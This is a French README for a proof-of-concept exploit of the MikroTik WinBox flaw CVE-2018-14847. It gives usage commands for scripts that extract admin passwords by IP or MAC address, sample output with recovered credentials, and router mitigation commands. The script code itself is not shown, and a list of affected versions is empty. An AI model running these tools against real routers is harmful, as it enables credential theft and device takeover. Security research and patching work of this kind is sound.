
Preuve de concept de la vulnérabilité critique de Winbox (CVE-2018-14847)
Ceci est une preuve de concept de la vulnérabilité critique WinBox (CVE-2018-14847) qui permet la lecture arbitraire de fichiers contenant des mots de passe en texte clair.
La vulnérabilité a été corrigée depuis longtemps, ce projet est donc terminé et ne sera plus supporté ni mis à jour. Vous pouvez le forker et le mettre à jour vous-même.
https://n0p.me/winbox-bug-dissection/
Ce script ne fonctionnera PAS avec Python 2.x ou inférieur.
Le script s'utilise simplement avec des arguments simples en ligne de commande.
Exploitez la vulnérabilité et lisez le mot de passe.
python3 WinboxExploit.py <ADRESSE-IP> [PORT]
Exemple :
$ python3 WinboxExploit.py 172.17.17.17
Connecté à 172.17.17.17:8291
Exploit réussi
Utilisateur : admin
Mot de passe : Th3P4ssWord
Vous pouvez extraire des fichiers même si l'appareil n'a pas d'adresse IP.
Vérification simple de découverte des appareils Mikrotik connectés localement.
python3 MACServerDiscover.py
Exemple :
$ python3 MACServerDiscover.py
Recherche d'appareils Mikrotik (serveurs MAC)
aa:bb:cc:dd:ee:ff
aa:bb:cc:dd:ee:aa
Exploitez la vulnérabilité et lisez le mot de passe.
python3 MACServerExploit.py <ADRESSE-MAC>
Exemple :
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff
Utilisateur : admin
Mot de passe : Th3P4ssWord
Toutes les versions de RouterOS du 28/05/2015 au 20/04/2018 sont vulnérables à cet exploit.
Appareils Mikrotik exécutant les versions RouterOS :
Pour plus d'informations, voir : https://blog.mikrotik.com/security/winbox-vulnerability.html
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
/tool mac-server mac-winbox